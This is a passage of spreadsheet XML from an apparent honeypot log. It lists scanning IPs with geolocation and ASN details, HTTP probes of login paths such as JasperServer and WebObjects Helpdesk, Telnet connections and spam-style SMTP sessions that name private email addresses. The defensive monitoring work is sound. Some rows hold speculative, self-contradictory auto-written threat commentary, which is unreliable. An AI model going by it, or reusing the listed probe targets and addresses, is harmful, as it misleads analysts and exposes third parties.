'/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '209.145.61.177', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b4:8c69"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="823"/>
    <x v="823"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:02:05"/>
    <d v="2025-04-25T22:02:05"/>
    <d v="2025-04-25T22:02:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.2088"/>
    <s v="59162"/>
    <s v="UPCSPL-AS-IN"/>
    <s v="U.p. Communication Services Pvt Ltd"/>
    <s v="corporate"/>
    <s v="Waves NET Solutions"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7286:1483"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No Telnet activity detected, possibly indicating malicious actors bypassing this service or avoiding detection through it. This lack of activity could be due to the system being configured to ignore or block all Telnet traffic by default. No additional information can be inferred from the log data as it only contains a &quot;NA&quot; value for Telnet logs. &amp;&amp; No recent TELNET activity detected, possibly indicating a lack of exploitation attempts against this service. No suspicious connections were found, which could be a good sign for security. This could indicate that the attackers have moved on to other targets."/>
    <s v="Telnet Scan &amp;&amp; Telnet Brute"/>
  </r>
  <r>
    <x v="824"/>
    <x v="824"/>
    <s v="node-p2p.pool-113-53.dynamic.nt-isp.net"/>
    <x v="0"/>
    <d v="2025-04-25T20:40:27"/>
    <d v="2025-04-25T20:40:27"/>
    <d v="2025-04-25T20:40:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Pathum Wan"/>
    <s v="Pathum Wan"/>
    <s v="7026842"/>
    <s v="10330"/>
    <s v="13.7365"/>
    <s v="100.524"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-01-17 03:50:09"/>
    <s v="2026-01-17 03:50:09"/>
    <s v="2025-01-20 03:36:34"/>
    <s v="['NS1.TOTONLINE.NET', 'NS2.TOTONLINE.NET']"/>
    <s v="GMO Internet, Inc."/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:7135:7ef1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="825"/>
    <x v="825"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T20:32:29"/>
    <d v="2025-03-28T10:24:41"/>
    <d v="2025-04-25T20:32:29"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="business"/>
    <s v="BSNL GSM EastZone"/>
    <s v="2004-09-06"/>
    <s v="BSNL-GSM-EastZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:1cfc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="826"/>
    <x v="826"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T20:22:38"/>
    <d v="2024-01-27T11:50:33"/>
    <d v="2025-04-25T20:22:38"/>
    <n v="336"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_SMTP_H7&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;22&amp;&amp;51201&amp;&amp;5900&amp;&amp;38798"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'spam'&amp;&amp; 'unknown']}"/>
    <n v="120"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="46"/>
    <s v="Jeollanam-do"/>
    <s v="Naju-si"/>
    <s v="Naju"/>
    <s v="1840536"/>
    <s v="NA"/>
    <s v="35.0292"/>
    <s v="126.717"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2009-02-10"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;farzad.razavi@qiau.ac.ir&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;larry@sisaz.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;benkosi2002@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mariadavid_100@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;obifrank2005@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;stephenbrown1973@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;kevin@palmgarden.com.tw&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;stemaj48@lineone.net&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;jennifer.slaunwhite@wcb.ns.ca&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;kyonggon.choi@daishin.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;elmalah@netvision.net.il&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;karen.webber@wcb.gov.ns.ca&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;jeffrey@taroko-int.com.tw&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;chenzo@smandes.com.ar&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@iopfund.com&gt;', 'command': 'MAIL', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70a4:434"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <s v="This data indicates that an attacker attempted to send emails from the monitored system, but the RSET command was used which may be a malicious attempt to reset the SMTP connection for potential future spam or phishing activities. This could be a tactic to evade detection and clear logs of previous email transmissions. It suggests a possible attempt to misuse the system's email service. &amp;&amp; An email is being sent from an unknown source with the sender address info@iopfund.com, attempting to send a message. This could be a spam or phishing attempt. The lack of recipient information makes it unclear who the target is. &amp;&amp; The data suggests an attacker is attempting to reset a message queue, possibly as part of spamming or phishing attempts. This action could be a reconnaissance step before sending malicious emails. The attacker may be trying to flush existing messages. &amp;&amp; This log suggests an attempt to reset a SMTP session, possibly a scan for vulnerable email servers or an initial step in sending spam emails. The action is likely part of a larger malicious activity targeting email infrastructure. It may be an automated probe by a botnet or other malicious software."/>
    <s v="Port Scan &amp;&amp; Phishing Spam"/>
  </r>
  <r>
    <x v="827"/>
    <x v="827"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T20:06:59"/>
    <d v="2025-04-25T20:06:59"/>
    <d v="2025-04-25T20:06:59"/>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2:41cf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity detected via Telnet, but may indicate potential reconnaissance or probing attempts to find open ports. No actual malicious data transfer occurred during this time period. This could be a sign of initial scanning before more targeted attacks. &amp;&amp; No activity detected, TELNET service not accessed recently but still available. No malicious attempts logged for this service so far. Data indicates normal operation with no suspicious behavior."/>
    <s v="Port Scan_x000a_Telnet Brute Force &amp;&amp; Brute Force"/>
  </r>
  <r>
    <x v="828"/>
    <x v="828"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T19:29:47"/>
    <d v="2023-11-30T21:42:51"/>
    <d v="2025-04-25T19:29:47"/>
    <n v="330"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;45474&amp;&amp;80&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="14"/>
    <s v="Mazovia"/>
    <s v="Warszawa"/>
    <s v="Warsaw"/>
    <s v="756135"/>
    <s v="NA"/>
    <s v="52.2297"/>
    <s v="21.0122"/>
    <s v="5617"/>
    <s v="Orange Polska Spolka Akcyjna"/>
    <s v="Orange Polska Spolka Akcyjna"/>
    <s v="business"/>
    <s v="Tpnet Polaczenia DLA Klient ATM"/>
    <s v="2003-12-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '66.94.127.183:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5301:f38a"/>
